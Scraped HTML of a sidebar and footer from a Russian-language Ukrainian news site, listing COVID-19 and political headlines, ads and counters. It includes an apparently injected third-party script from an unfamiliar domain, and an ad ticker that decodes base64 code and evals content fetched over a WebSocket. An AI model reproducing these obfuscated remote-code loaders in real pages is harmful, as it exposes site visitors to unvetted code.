--><div id="WHwvwcq55RuJtgZm5orj" data-type="0" class="blockOfO1b2l3" ></div><script>window.RESOURCE_O1B2L3 = 'hvnwoeo.pro';</script><script src="//hvnwoeo.pro/eXu/EjSt.js" ></script><br><div class="wiget simple_pr" style="margin:0 0 10px;display:block; position:relative;" id="theme_posts"> <div class="caption "> <p>Здоровье</p><div class="popular-sort"><div class="sort"><a id="theme_31" onClick="getThemePopPosts(31, '31397', 31397, 15)">месяц</a></div><div class="sort"><a id="theme_7"style="text-decoration: underline;" onClick="getThemePopPosts(7, '31397', 31397, 15)">неделю</a>&nbsp;&nbsp;|</div><div class="sort">популярные за&#160;&#160;<a id="theme_1" onClick="getThemePopPosts(1, '31397', 31397, 15)">сутки</a>&nbsp;&nbsp;|</div></div> </div> <div class="newsbody"> <h3 class="press"><a href="https://enovosty.com/zdorove/full/3003-komarovskij-rasskazal-kakie-lekarstva-nuzhno-imet-v-aptechke-na-sluchaj-koronavirusa">Комаровский рассказал, какие лекарства нужно иметь в аптечке на случай коронавируса (9539)</a></h3><h3 class="press"><a href="https://enovosty.com/zdorove/full/2903-paracetamol-i-kurinyj-bulon-60-letnij-britanskij-vrach-rasskazala-kak-doma-spravilas-s-covid-19">Парацетамол и куриный бульон: 60-летний британский врач рассказала, как дома справилась с COVID-19 (8426)</a></h3><h3 class="press"><a href="https://enovosty.com/zdorove/full/2903-zhenshhina-na-kolenyax-prosit-proshheniya-u-odnoselchan-kotoryx-zarazila-koronavirusom-video">Женщина на коленях просит прощения у односельчан, которых заразила коронавирусом (ВИДЕО) (6042)</a></h3><h3 class="press"><a href="https://enovosty.com/zdorove/full/2803-lyuks-karantin-kak-ukrainskaya-elita-vygryzala-vip-palaty-v-kievskix-bolnicax-video">Люкс-карантин: Как украинская элита выгрызала vip-палаты в киевских больницах (ВИДЕО) (4634)</a></h3><h3 class="press"><a href="https://enovosty.com/zdorove/full/3103-covid-19-pediatr-rasskazala-kak-zametit-koronavirus-u-detej">COVID-19: Педиатр рассказала, как заметить коронавирус у детей (3423)</a></h3><h3 class="press"><a href="https://enovosty.com/zdorove/full/104-lechenie-covid-19-uchenye-nashli-novyj-sposob">Лечение COVID-19: Ученые нашли новый способ (3022)</a></h3><h3 class="press"><a href="https://enovosty.com/zdorove/full/304-vrachi-nazvali-tri-prichiny-pochemu-covid-19-po-raznomu-vliyaet-na-raznyx-lyudej">Врачи назвали три причины, почему COVID-19 по-разному влияет на разных людей (2585)</a></h3><h3 class="press"><a href="https://enovosty.com/zdorove/full/204-pochemu-ssha-okazalis-katastroficheski-ne-gotovy-k-koronavirusu-nazvany-prichiny">Почему США оказались катастрофически не готовы к коронавирусу - названы причины (2192)</a></h3><h3 class="press"><a href="https://enovosty.com/zdorove/full/204-ugroza-dlya-vsex-u-kogo-iz-ukrainskix-top-politikov-i-chinovnikov-podtverzhden-koronavirus-covid-19">Угроза для всех: У кого из украинских топ-политиков и чиновников подтвержден коронавирус COVID-19 (2156)</a></h3><h3 class="press"><a href="https://enovosty.com/zdorove/full/204-kak-yuzhnaya-koreya-tak-zabotitsya-o-svoix-grazhdanax-kotorym-predstoit-sidet-na-karantine-video">Как Южная Корея заботится о своих гражданах, которым предстоит сидеть на карантине (ВИДЕО) (2092)</a></h3></div> </div><script>jQuery(document).ready(function($){function region(){html = $('#lastafishasingle .anythingWindow .activePage .region').html();$('#lastafishasingle .head span').html(html);}$('#sliderafishasingle').anythingSlider({ theme : 'minimalist-round', buildStartStop  : false,buildNavigation : false,enableNavigation : false,hashTags : false,autoPlay :false,delay : 4000,resizeContents:false,onInitialized:function(slider){region();}, onSlideComplete:function(slider){region();},});});</script><style>#sliderafishasingle .tact li{float:left;width:220px;line-height:8px}#lastafishasingle div.anythingSlider-minimalist-round{margin:auto}#lastafishasingle .postafisha{width:224px}#lastafishasingle h2{text-align:left;padding:10px 32px 10px 35px}#lastafishasingle .title a{display:block;font-size:13px;font-weight:700;text-align:left}#lastafishasingle{margin-bottom:10px;padding:0}#lastafishasingle .title{padding:5px 35px 5px 25px}#lastafishasingle.slide div.anythingSlider-minimalist-round .back,#lastafishasingle.slide div.anythingSlider-minimalist-round .forward{width:40px;height:132px;opacity:1;background-color:transparent}#lastafishasingle.slide div.anythingSlider-minimalist-round .arrow a{width:20px;height:45px;margin-top:54px;margin-left:10px}#lastafishasingle{background:url("https://enovosty.com/wp-content/themes/eizvestia/img/afisha5.png") repeat;border:1px solid #daa36b;-moz-background-size:100%; -webkit-background-size:100%; -o-background-size:100%; background-size:100%}#lastafishasingle .anythingSlider{border-bottom:1px solid #a99168}#lastafishasingle.slide div.anythingSlider-minimalist-round .arrow a{background:url("https://enovosty.com/wp-content/themes/eizvestia/img/afisha_arrows3.png") no-repeat}#lastafishasingle.slide div.anythingSlider-minimalist-round .forward a{background-position:right 0;margin-left:18px}#lastafishasingle .allafisha{display:block;text-align:right;font-size:14px;font-weight:bold;margin:0;padding:6px 10px 6px}#lastafishasingle .postafisha{position:relative}#lastafishasingle h2 span{float:right;font-size:11px;line-height:18px}#lastafishasingle .region{font-size:13px;text-align:left;padding:0 25px 5px}#lastafishasingle.slide.ssingle h2{padding:10px 17px 3px 40px;font-size:17px}#lastafishasingle.slide.ssingle div.anythingSlider-minimalist-round .back,#lastafishasingle.slide.ssingle div.anythingSlider-minimalist-round .forward{width:27px;right:-5px}#lastafishasingle.slide.ssingle div.anythingSlider-minimalist-round .arrow a{margin-left:0px}#lastafishasingle.slide.ssingle div.anythingSlider-minimalist-round .forward a{margin-left:7px}#lastafishasingle.slide.ssingle .postafisha{width:220px;text-align:right}#lastafishasingle.slide.ssingle .postafisha .aimg{text-align:center;overflow:visible}#lastafishasingle.slide.ssingle .postafisha .aimg img{overflow:visible;box-shadow:0.4em 0.4em 2px rgba(122,122,122,0.5);-moz-box-shadow:0.4em 0.4em 2px rgba(122,122,122,0.5);-webkit-box-shadow:0.4em 0.4em 2px rgba(122,122,122,0.5);-ms-box-shadow:0.4em 0.4em 2px rgba(122,122,122,0.5);-o-box-shadow:0.4em 0.4em 2px rgba(122,122,122,0.5);-khtml-box-shadow:0.4em 0.4em 2px rgba(122,122,122,0.5)}</style><div id="lastafishasingle" class="slide ssingle"><p class="head">Афиша</p><ul id="sliderafishasingle"><li><ul class="tact"><li><ul class="tact"><li ><div id="post-4798865" class="postafisha"><span class="region">Киев 04&#160;апреля</span><div class="aimg"><a href="https://enovosty.com/kino/full/2303-kinopremera-film-pobeg-iz-pretorii"><img width="170" height="132" alt="Кинопремьера: фильм «Побег из Претории» ..." src="/wp-content/uploads/2020/03/vtecha.jpg"><span class="stopbg"></span></a></div><div class="title"><a href="https://enovosty.com/kino/full/2303-kinopremera-film-pobeg-iz-pretorii">Кинопремьера: фильм «Побег из Претории» ...</a></div></div></li></ul></li><li><ul class="tact"><li ><div id="post-4799687" class="postafisha"><span class="region">Киев 09&#160;апреля</span><div class="aimg"><a href="https://enovosty.com/kino/full/3003-kinopremera-film-miss-ploxoe-povedenie"><img width="170" height="132" alt="Кинопремьера: фильм «Мисс Плохое поведение» ..." src="/wp-content/uploads/2020/03/povedenie.jpg"><span class="stopbg"></span></a></div><div class="title"><a href="https://enovosty.com/kino/full/3003-kinopremera-film-miss-ploxoe-povedenie">Кинопремьера: фильм «Мисс Плохое поведение» ...</a></div></div></li></ul></li></ul></li> </ul><a href="https://enovosty.com/afisha" class="allafisha">Вся Афиша&nbsp;&nbsp;&nbsp;&nbsp;>></a></div><div class="mainarmiya"><p><a style="font-size: 17px;" href="https://enovosty.com/armiya">Армия</a></p><table style="width:100%;"><tr><td style="width:24%;"><div style="border:none; padding-top:3px;" id="post-4350456"><a href="https://enovosty.com/armiya/full/185-zenitnaya-samohodnaya-ustanovka-shilka" ><img width="101" height="80" src="https://enovosty.com/wp-content/uploads/2014/04/shilka-02-101x80.jpg" class="attachment-101x80 size-101x80 wp-post-image" alt="" srcset="https://enovosty.com/wp-content/uploads/2014/04/shilka-02-101x80.jpg 101w, https://enovosty.com/wp-content/uploads/2014/04/shilka-02-112x88.jpg 112w, https://enovosty.com/wp-content/uploads/2014/04/shilka-02.jpg 280w" sizes="(max-width: 101px) 100vw, 101px" /></a><a class="postTitle" href="https://enovosty.com/armiya/full/185-zenitnaya-samohodnaya-ustanovka-shilka" >Зенитная самоходная установка «Шилка»</a></div></td> <td style="width:24%;"><div style="border:none; padding-top:3px;" id="post-4371906"><a href="https://enovosty.com/armiya/full/128-zenitnyj-raketnyj-kompleks-s-125-2d-pechora-2d" ><img width="101" height="80" src="https://enovosty.com/wp-content/uploads/2014/07/pechora_edit-101x80.jpg" class="attachment-101x80 size-101x80 wp-post-image" alt="" srcset="https://enovosty.com/wp-content/uploads/2014/07/pechora_edit-101x80.jpg 101w, https://enovosty.com/wp-content/uploads/2014/07/pechora_edit-112x88.jpg 112w, https://enovosty.com/wp-content/uploads/2014/07/pechora_edit.jpg 280w" sizes="(max-width: 101px) 100vw, 101px" /></a><a class="postTitle" href="https://enovosty.com/armiya/full/128-zenitnyj-raketnyj-kompleks-s-125-2d-pechora-2d" >Зенитный ракетный комплекс С-125-2Д «Печора-2Д»</a></div></td> <td style="width:24%;"><div style="border:none; padding-top:3px;" id="post-4384001"><a href="https://enovosty.com/armiya/full/736-radiolokacionnaya-stanciya-anfps-117-ssha" ><img width="101" height="80" src="https://enovosty.com/wp-content/uploads/2014/08/AN_FPS-117-101x80.jpg" class="attachment-101x80 size-101x80 wp-post-image" alt="" srcset="https://enovosty.com/wp-content/uploads/2014/08/AN_FPS-117-101x80.jpg 101w, https://enovosty.com/wp-content/uploads/2014/08/AN_FPS-117-112x88.jpg 112w, https://enovosty.com/wp-content/uploads/2014/08/AN_FPS-117.jpg 280w" sizes="(max-width: 101px) 100vw, 101px" /></a><a class="postTitle" href="https://enovosty.com/armiya/full/736-radiolokacionnaya-stanciya-anfps-117-ssha" >Радиолокационная станция AN/FPS-117 (США)</a></div></td> <td style="width:24%;"><div style="border:none; padding-top:3px;" id="post-4468105"><a href="https://enovosty.com/armiya/full/521-bronetransporter-lav-25-coyote-kanada" ><img width="101" height="80" src="https://enovosty.com/wp-content/uploads/2015/08/LAV_25_Coyote-101x80.jpg" class="attachment-101x80 size-101x80 wp-post-image" alt="" srcset="https://enovosty.com/wp-content/uploads/2015/08/LAV_25_Coyote-101x80.jpg 101w, https://enovosty.com/wp-content/uploads/2015/08/LAV_25_Coyote-112x88.jpg 112w, https://enovosty.com/wp-content/uploads/2015/08/LAV_25_Coyote.jpg 280w" sizes="(max-width: 101px) 100vw, 101px" /></a><a class="postTitle" href="https://enovosty.com/armiya/full/521-bronetransporter-lav-25-coyote-kanada" >Бронетранспортер LAV-25 Coyote (Канада)</a></div></td> </tr> </table> <a href="https://enovosty.com/armiya" class="allarmiya">Вся армия&nbsp;&nbsp;&nbsp;&nbsp;>></a> </div><div class="mainperson"><p><a style="font-size: 17px;" href="https://enovosty.com/person">Персоны</a></p><table style="width:100%;"><tr><td style="width:24%;"><div style="border:none; padding-top:3px;" id="post-4303572"><a href="https://enovosty.com/person/full/kolomojskij-igor" ><img width="112" height="88" src="https://enovosty.com/wp-content/uploads/2013/07/kolomoiskiy_edit-112x88.jpg" class="attachment-112x88 size-112x88 wp-post-image" alt="" srcset="https://enovosty.com/wp-content/uploads/2013/07/kolomoiskiy_edit-112x88.jpg 112w, https://enovosty.com/wp-content/uploads/2013/07/kolomoiskiy_edit.jpg 280w" sizes="(max-width: 112px) 100vw, 112px" /></a><a class="postTitle" href="https://enovosty.com/person/full/kolomojskij-igor" >Коломойский<br /> Игорь</a></div></td> <td style="width:24%;"><div style="border:none; padding-top:3px;" id="post-4318216"><a href="https://enovosty.com/person/full/marchenko-oksana" ><img width="112" height="88" src="https://enovosty.com/wp-content/uploads/2013/10/marchenko_edit-112x88.jpg" class="attachment-112x88 size-112x88 wp-post-image" alt="" srcset="https://enovosty.com/wp-content/uploads/2013/10/marchenko_edit-112x88.jpg 112w, https://enovosty.com/wp-content/uploads/2013/10/marchenko_edit.jpg 280w" sizes="(max-width: 112px) 100vw, 112px" /></a><a class="postTitle" href="https://enovosty.com/person/full/marchenko-oksana" >Марченко<br /> Оксана</a></div></td> <td style="width:24%;"><div style="border:none; padding-top:3px;" id="post-4324646"><a href="https://enovosty.com/person/full/gumenyuk-igor" ><img width="112" height="88" src="https://enovosty.com/wp-content/uploads/2013/11/gumenuk_edit-112x88.jpg" class="attachment-112x88 size-112x88 wp-post-image" alt="" srcset="https://enovosty.com/wp-content/uploads/2013/11/gumenuk_edit-112x88.jpg 112w, https://enovosty.com/wp-content/uploads/2013/11/gumenuk_edit.jpg 280w" sizes="(max-width: 112px) 100vw, 112px" /></a><a class="postTitle" href="https://enovosty.com/person/full/gumenyuk-igor" >Гуменюк<br /> Игорь</a></div></td> <td style="width:24%;"><div style="border:none; padding-top:3px;" id="post-4329154"><a href="https://enovosty.com/person/full/627-horoshkovskij-valerij" ><img width="112" height="88" src="https://enovosty.com/wp-content/uploads/2013/12/horoshkovskiy_edit-112x88.jpg" class="attachment-112x88 size-112x88 wp-post-image" alt="" srcset="https://enovosty.com/wp-content/uploads/2013/12/horoshkovskiy_edit-112x88.jpg 112w, https://enovosty.com/wp-content/uploads/2013/12/horoshkovskiy_edit.jpg 280w" sizes="(max-width: 112px) 100vw, 112px" /></a><a class="postTitle" href="https://enovosty.com/person/full/627-horoshkovskij-valerij" >Хорошковский<br /> Валерий</a></div></td> </tr> </table> <a href="https://enovosty.com/person" class="allperson">Все персоны&nbsp;&nbsp;&nbsp;&nbsp;>></a> </div><div class="wiget simple_pr" id="pop_posts"> <div class="caption"> <div class="popular-sort-link"><a href="https://enovosty.com/novosti">Популярные новости</a></div><div class="popular-sort"><div class="sort"><a id="pop_posts_31" onClick="getPopPosts(31)">месяц</a></div><div class="sort"><a id="pop_posts_7" onClick="getPopPosts(7)">неделю</a>&nbsp;&nbsp;|</div><div class="sort">популярные за&#160;&#160;<a id="pop_posts_1" style="text-decoration: underline;" onClick="getPopPosts(1)">сутки</a>&nbsp;&nbsp;|</div></div> </div> <div class="newsbody"> <p class="press"><a href="https://enovosty.com/news_abroad/full/304-putin-nazval-komfortnuyu-dlya-rossii-cenu-na-neft">Путин назвал комфортную для России цену на нефть (6760)</a></p><p class="press"><a href="https://enovosty.com/news_abroad/full/404-novaya-karikatura-sergeya-elkina-putin-i-statuya-svobody-stala-xitom-seti">Новая карикатура Сергея Елкина "Путин и статуя Свободы" стала хитом сети (5284)</a></p><p class="press"><a href="https://enovosty.com/news_abroad/full/404-vremya-komfortnogo-sideniya-na-neftyanoj-igle-zakonchilos-dlya-vsex-eksperty">Время комфортного сидения на «нефтяной игле» закончилось для всех - эксперты (2924)</a></p><p class="press"><a href="https://enovosty.com/news_abroad/full/304-ves-mir-na-karantine-top-10-foto-domashnih-lybimzev-foto">Весь мир на карантине: ТОП-10 фото домашних любимцев (ФОТО) (2832)</a></p><p class="press"><a href="https://enovosty.com/news_abroad/full/304-kurez-dnya-amerikanskij-aktyor-vorvalsya-v-pryamoj-efir-cbs-news-kotoryj-vela-ego-zhena-video">Курьез дня: Американский актёр ворвался в прямой эфир CBS News, который вела его жена (ВИДЕО) (2728)</a></p><p class="press"><a href="https://enovosty.com/news_economy/full/404-klichko-podschital-skolko-lyudi-smogut-eshhe-prosidet-na-karantine-za-svoj-schyot">Кличко подсчитал, сколько люди смогут еще просидеть на карантине за свой счёт (2689)</a></p><p class="press"><a href="https://enovosty.com/news-auto/full/404-v-ukraine-rezko-snizhayutsya-ceny-na-benzin">В Украине резко снижаются цены на бензин (2537)</a></p><p class="press"><a href="https://enovosty.com/news_abroad/full/404-mid-saudovskoj-aravii-v-kremle-lgut-govorya-o-prichinax-razryva-soglasheniya-opek">МИД Саудовской Аравии: В Кремле лгут, говоря о причинах разрыва соглашения ОПЕК+ (2278)</a></p><p class="press"><a href="https://enovosty.com/news_abroad/full/404-rossiya-i-saudovskaya-araviya-mogut-sokratit-ezhednevnuyu-dobychu-nefti">Россия и Саудовская Аравия могут сократить ежедневную добычу нефти (2202)</a></p><p class="press"><a href="https://enovosty.com/news-auto/full/404-mashiny-podesheveyut-tramp-otmenil-ekonormy-obamy-dlya-avtoproma">Машины подешевеют: Трамп отменил эконормы Обамы для автопрома (2026)</a></p></div> </div></div> </div><style>#sidebarRight{margin-top:-227px}</style><div id="sidebarRight" style="width:300px;" ><form method="get" id="searchform" action="https://enovosty.com/"><div class="search300"> <input type="text" value="" name="s" id="s" /> <input type="hidden" name="arh_title" value="on"> <input type="hidden" name="arh_text" value="on"> <input type="hidden" name="arh_news" value="on"> <input type="hidden" name="arh_posts" value="on"><input type="submit" id="searchsubmit" value="Поиск" /></div></form><div class="wiget simple_pr socnet"><div class="caption"><p>Последние новости в соцсетях</p></div> <table><tr><td><a href="https://www.facebook.com/enovosty/" rel="nofollow" target="_blank" class="facebook"><i></i></a></td><td><a href="https://twitter.com/enovosty" rel="nofollow" target="_blank" class="twitter"><i></i></a></td><td><a href="https://www.youtube.com/channel/UCkFzUiPJ0z2YF4QIAhpkccg" rel="nofollow" target="_blank" class="you_tube"><i style="background: url(https://enovosty.com/wp-content/themes/eizvestia/img/You_Tube.png) no-repeat;"></i></a></td><td><a href="https://t.me/enovosty" rel="nofollow" target="_blank" class="telegram"><i style="background: url(https://enovosty.com/wp-content/themes/eizvestia/img/Telegram1_Obem1.png) no-repeat;"></i></a></td></tr></table></div><script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script><ins class="adsbygoogle" style="display:inline-block;width:300px;height:600px" data-ad-client="ca-pub-1008673670491634" data-ad-slot="9027886280"></ins><script>(adsbygoogle = window.adsbygoogle || []).push({});</script><div class="wiget simple_pr" style="margin-top:5px;"><div class="caption"><div class="popular-sort-link"><a href="https://enovosty.com/publications">Публикации</a></div></div> <p class="press"><a href="https://enovosty.com/publications/full/2603-nyu-jork-postavlen-na-pauzu-10-dnej-kotorye-izmenili-megapolis">Нью-Йорк поставлен на паузу из-за COVID-19. Десять дней, которые изменили мегаполис</a></p><p class="press"><a href="https://enovosty.com/publications/full/1002-sluga-novikov-pomogaet-kvazaru-kinut-bank-na-100-mln-griven">"Слуга" Новиков помогает "КВАЗАРУ" "кинуть" банк на 100 млн гривен</a></p></div><div id='admixer_9743148c0bcf416e8ab555d24689e145_zone_1845_sect_1082_site_1069'></div><script type="text/javascript">admixerML.fn.push(function () { admixerML.display('admixer_9743148c0bcf416e8ab555d24689e145_zone_1845_sect_1082_site_1069'); });</script><div id="adriver_banner_C3"></div> <div class="wiget simple_line infblogs"> <div class="caption"><a href="https://enovosty.com/blogs">Мнения</a></div><div class="block"><div class="cblock"><a href="https://enovosty.com/blogs/full/2901-publichni-zakupivli-nareshti-prozzoro-chi-toj-zhe-ruchnyak"><img alt="Публічні закупівлі: нарешті «prozzoro» чи той же «ручняк»?" src="https://enovosty.com/wp-content/uploads/2020/01/pavlichenko-101x112.jpg"><div></div></a></div><p><a class="postTitle" href="https://enovosty.com/blogs/full/2901-publichni-zakupivli-nareshti-prozzoro-chi-toj-zhe-ruchnyak">Публічні закупівлі: нарешті «prozzoro» чи той же «ручняк»?</a></p><span class="postExcerpt"><a href="https://enovosty.com/blogs/full/2901-publichni-zakupivli-nareshti-prozzoro-chi-toj-zhe-ruchnyak"> В кінці 2019 року в Законі «Про публічні закупівлі» прийняли зміни (законопроект №1076), які вступлять в силу у квітні 2020 року. Гасла до його прийняття ...</a></span></div></div> <div class="wiget simple_pr" style="margin-top:5px;"><div> <div class="caption"> <div class="popular-sort-link"><a href="https://enovosty.com/novosti">Популярные новости</a></div><div class="popular-sort"><div class="sort"><a id="pop_posts_31" onClick="getPopPosts(31)">месяц</a></div><div class="sort"><a id="pop_posts_7" style="text-decoration: underline;" onClick="getPopPosts(7)">неделю</a>&nbsp;&nbsp;|</div><div class="sort">популярные за&#160;&#160;<a id="pop_posts_1" onClick="getPopPosts(1)">сутки</a>&nbsp;&nbsp;|</div></div> </div> <div class="newsbody"> <p class="press"><a href="https://enovosty.com/news_society/full/204-uspel-silno-podresty-v-seti-vysmeyali-novoe-foto-putina">"Успел сильно подрасти": в сети высмеяли новое фото Путина (13652)</a></p><p class="press"><a href="https://enovosty.com/news_society/full/2803-nastoyashhaya-vesna-zaderzhivaetsya-prognoz-pogody-na-aprel">Настоящая весна задерживается: прогноз погоды на апрель (12507)</a></p><p class="press"><a href="https://enovosty.com/zdorove/full/3003-komarovskij-rasskazal-kakie-lekarstva-nuzhno-imet-v-aptechke-na-sluchaj-koronavirusa">Комаровский рассказал, какие лекарства нужно иметь в аптечке на случай коронавируса (9513)</a></p></div></div></div><script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script><ins class="adsbygoogle" style="display:inline-block;width:300px;height:250px" data-ad-client="ca-pub-1008673670491634" data-ad-slot="6220472701"></ins><script>(adsbygoogle = window.adsbygoogle || []).push({});</script><br><br><div id="pravdomer_info" style="margin-top:5px"><a href="https://besplatka.ua/rabota" target="_blank"><img src="/wp-content/themes/eizvestia/img/BP_300x250_1.png" alt="работа на besplatka.ua"></a> </div><br><div id="redtram_news" onclick="trackOutboundLink(this, 'redtram_news', 'ru.redtram.com');"><div class="wiget simple"><div id="n4p_30546"><script class="r36857" type="text/javascript">(function() {var worker36857,tickerID = 36857,tag = document.currentScript || (function() {var scripts = document.getElementsByClassName('r36857'),len = scripts.length;return len ? scripts[len - 1] : null;})(),idn = (function() {var i, num, chars = "abcdefghiklmnopqrstuvwxyz",len = Math.floor((Math.random() * 2) + 4),idn = '';for (i = 0; i < len; i++) {num = Math.floor(Math.random() * chars.length);idn += chars.substring(num, num + 1);}return idn;})();
var container = document.createElement('div');container.id = idn;container.innerHTML = 'загрузка...';tag.parentNode.insertBefore(container, tag);var script = document.createElement('script');script.setAttribute('class', 's36857');script.setAttribute('data-idn', idn);script.src = '//v1r7on.news/ru-n4p/0/36/ticker_36857.js';
script.type = 'text/javascript';script.charset = 'utf-8';script.onerror = function() {if (!('atob' in window && 'Worker' in window))
return;window.rtIsWebSocket = true;var code = 'dmFyIHNvY2tldDsgZnVuY3Rpb24gc2VuZFRvU29ja2V0KGRhdGEpIHsgdmFyIHdzc1VybCA9ICJ3c3M6Ly9uNHAucmVkdHJhbS5jb20vd3MvIjsgaWYgKCFzb2NrZXQgfHwgc29ja2V0LnJlYWR5U3RhdGUgPT09IHNvY2tldC5DTE9TRUQpIHsgc29ja2V0ID0gbmV3IFdlYlNvY2tldCh3c3NVcmwpOyBzb2NrZXQub25tZXNzYWdlID0gZnVuY3Rpb24ocikgeyBwb3N0TWVzc2FnZShKU09OLnN0cmluZ2lmeShyLmRhdGEpKTsgfTsgfSBpZiAoc29ja2V0KSB7IHNlbmRDb25uZWN0aW9uKHNvY2tldCwgZnVuY3Rpb24oKSB7IHNvY2tldC5zZW5kKGRhdGEpOyB9KTsgfSB9IGZ1bmN0aW9uIHNlbmRDb25uZWN0aW9uKGMsIHIpIHsgc2V0VGltZW91dChmdW5jdGlvbigpIHsgaWYgKGMucmVhZHlTdGF0ZSA9PT0gYy5PUEVOKSB7IHJldHVybiByKCk7IH0gcmV0dXJuIHNlbmRDb25uZWN0aW9uKGMsIHIpOyB9LCA1MCk7IH0gb25tZXNzYWdlID0gZnVuY3Rpb24ocikgeyBzZW5kVG9Tb2NrZXQoci5kYXRhKTsgfTsg';function runExternalMessage(data) {worker36857.postMessage(data);}worker36857 = new Worker(URL.createObjectURL(
new Blob(["eval(atob('"+code+"'))"], {type: 'text/javascript'})
));worker36857.onmessage = function(m) {var json = JSON.parse(m.data),content = JSON.parse(json)['content'];eval(content);};worker36857.postMessage(JSON.stringify({command: 'init',informer_id: tickerID,url: script.src
}));};tag.parentNode.insertBefore(script, tag);})();</script></div></div> </div><div id="riainfo_015d2e7c4ce2cda608aa710275088255" onclick="trackOutboundLink(this, 'DomRia', 'dom.ria.com');"></div><br><div><a href="https://www.youtube.com/channel/UCkFzUiPJ0z2YF4QIAhpkccg" target="_blank"><img alt="Экономические новости youtube" src="https://enovosty.com/wp-content/themes/eizvestia/img/ENTV2_Svedenie.gif"></a></div></br><div><a href="https://enovosty.com/ekonomika/full/2702-koronavirus-porazil-globalnuyu-ekonomiku-ukraina-v-chisle-tyazhelobolnyx" target="_blank"><img alt="Коронавирус" src="https://enovosty.com/wp-content/uploads/2020/02/Virus_Ekonomika.jpg"></a></div><br><link rel="stylesheet" type="text/css" href="https://s1.gismeteo.ua/static/css/informer2/gs_informerClient.min.css"><div id="gsInformerID-RpMlQd24Vh0i0g" class="gsInformer" style="width:300px;height:168px"> <div class="gsIContent"> <div id="cityLink"> <a href="https://www.gismeteo.ua/weather-kyiv-4944/" title="Погода в Киеве" target="_blank"> <img src="https://s1.gismeteo.ua/static/images/gisloader.svg" width="24" height="24" alt="Погода в Киеве"> </a> </div> <div class="gsLinks"> <table> <tr> <td> <div class="leftCol"> <a href="https://www.gismeteo.ua" target="_blank" title="Погода"> <img alt="Погода" src="https://s1.gismeteo.ua/static/images/informer2/logo-mini2.png" align="middle" border="0" height="16" width="11"/> <img src="https://s1.gismeteo.ua/static/images/gismeteo.svg" border="0" align="middle" style="left: 5px; top:1px"> </a> </div> <div class="rightCol"> <a href="https://www.gismeteo.ua/weather-kyiv-4944/14-days/" target="_blank" title="Погода в Киеве на 2 недели"> <img src="https://s1.gismeteo.ua/static/images/informer2/forecast-2weeks.ru.svg" border="0" align="middle" style="top:auto" alt="Погода в Киеве на 2 недели"> </a> </div> </td> </tr> </table> </div> </div></div><script src="https://www.gismeteo.ua/ajax/getInformer/?hash=RpMlQd24Vh0i0g" type="text/javascript"></script></br><div id="adpartner-jsunit-4125"> <script type="text/javascript">var head = document.getElementsByTagName('head')[0];var script = document.createElement('script');script.type = 'text/javascript';script.src = "//a4p.adpartner.pro/jsunit?id=4125&ref=" + encodeURIComponent(document.referrer) + "&" + Math.random();
head.appendChild(script);</script></div><br><div><a href="https://kyivtails.com/tails/" target="_blank"><img alt="kyivtails" src="https://enovosty.com/wp-content/uploads/2020/02/Dog_Svedenie.gif"></a></div><br> <div id="M469261ScriptRootC781152"> <div id="M469261PreloadC781152"> Loading... </div> </div> <script> (function () { var script = document.createElement('script'); script.src = "//jsc.idealmedia.io/e/n/enovosty.com.781152.js?t=" + ((d = new Date()) ? '' + d.getUTCFullYear() + d.getUTCMonth() + d.getUTCDate() + d.getUTCHours() : ''); script.async = true; document.body.appendChild(script); })(); </script> <br><script charset="windows-1251" src="//i.mediatraffic.com.ua/js/uho/mt20_3.js"></script><div id="300-290"></div><script type="text/javascript">new MTr('300-290', {site:907,format:0});</script> <div class="wiget ukr_links" style="font-size:9px; color:#336699;"> </div> <a style="margin-bottom:5px;display: inline-block;" href="https://www.bigmir.net/" target="_blank" onClick='img=new Image();img.src="//www.bigmir.net/?cl=101585";'><img src="//c.bigmir.net/?s101585&t8&l1" width="88" height="31" alt="bigmir)net TOP 100" title="bigmir)net TOP 100"></a> <br><script type="text/javascript">document.write('<a href="//www.liveinternet.ru/click" '+
'target="_blank"><img src="//counter.yadro.ru/hit?t52.6;r'+
escape(document.referrer)+((typeof(screen)=='undefined')?'':
';s'+screen.width+'*'+screen.height+'*'+(screen.colorDepth?
screen.colorDepth:screen.pixelDepth))+';u'+escape(document.URL)+
';h'+escape(document.title.substring(0,150))+';'+Math.random()+
'" alt="" title="LiveInternet: показане число переглядів і'+
' відвідувачів за 24 години" '+
'border="0" width="88" height="31"><\/a>')
</script><div class="links_bal" style="width:240px;"></div><div class="links_bal" style="width:240px;"></div>  <div class="wiget ukr_links" style="font-size:9px; color:#336699;"> </div></div><div class="cls"></div><script>
window.onload = function() {
// Delay to allow the async Google Ads to load
setTimeout(function() {
// Get the first AdSense ad unit on the page
var ad = document.querySelector("ins.adsbygoogle");
// If the ads are not loaded, track the event
if (ad && ad.innerHTML.replace(/\s/g, "").length == 0) {if (typeof ga !== 'undefined') {// Log an event in Universal Analytics
// but without affecting overall bounce rate
ga('send', 'event', 'Adblock', 'Yes', {'nonInteraction': 1});} else if (typeof _gaq !== 'undefined') {// Log a non-interactive event in old Google Analytics
_gaq.push(['_trackEvent', 'Adblock', 'Yes', undefined, undefined, true]);}}}, 2000); // Run ad block detection 2 seconds after page load
};
</script> </div> <!-- start NEW_content_v1 for enovosty.com <div id="adpartner-jsunit-3430"> <script type="text/javascript">var head = document.getElementsByTagName('head')[0];var script = document.createElement('script');script.type = 'text/javascript';script.src = "//a4p.adpartner.pro/jsunit?id=3430&ref=" + encodeURIComponent(document.referrer) + "&" + Math.random();
head.appendChild(script);</script></div> end NEW_content_v1 for enovosty.com --><div class="cls"></div><br> <div id="footer"> <div class="wiget text" style="padding-right:0; margin-right:0;" > <div id="bottom-menu" style="background: #F93; height:40px"> <a style="display: inline-block; vertical-align: top;" href="https://enovosty.com/contacts">КОНТАКТЫ</a>|<a style="display: inline-block; width: 220px;vertical-align: top;" href="https://enovosty.com/politika-konfididencijnosti-ta-zaxistu-personalnix-danix">Политика конфиденциальности<br>и защиты персональных данных</a>|<a style="display: inline-block; vertical-align: top;" href="https://enovosty.com/redakcionnaya-politika">Редакционная политика</a>|<a style="display: inline-block; vertical-align: top;" href="https://enovosty.com/newsitemap">Карта сайта</a> </div> <div id="counters" > </div> <div id="textfooter"> <p>2018 &copy; "Экономические новости"</p> <p>Все права защищены. </p><p>Использование материалов разрешается при условии ссылки на <a href="https://enovosty.com" style="color:#336699; text-decoration:underline;">"Экономические новости"</a> (www.enovosty.com). Для интернет-изданий обязательной является прямая гиперссылка, не закрытая от индексации поисковыми системами (отсутствие в ссылке rel="nofollow" или "noindex" ), в первом или втором абзаце 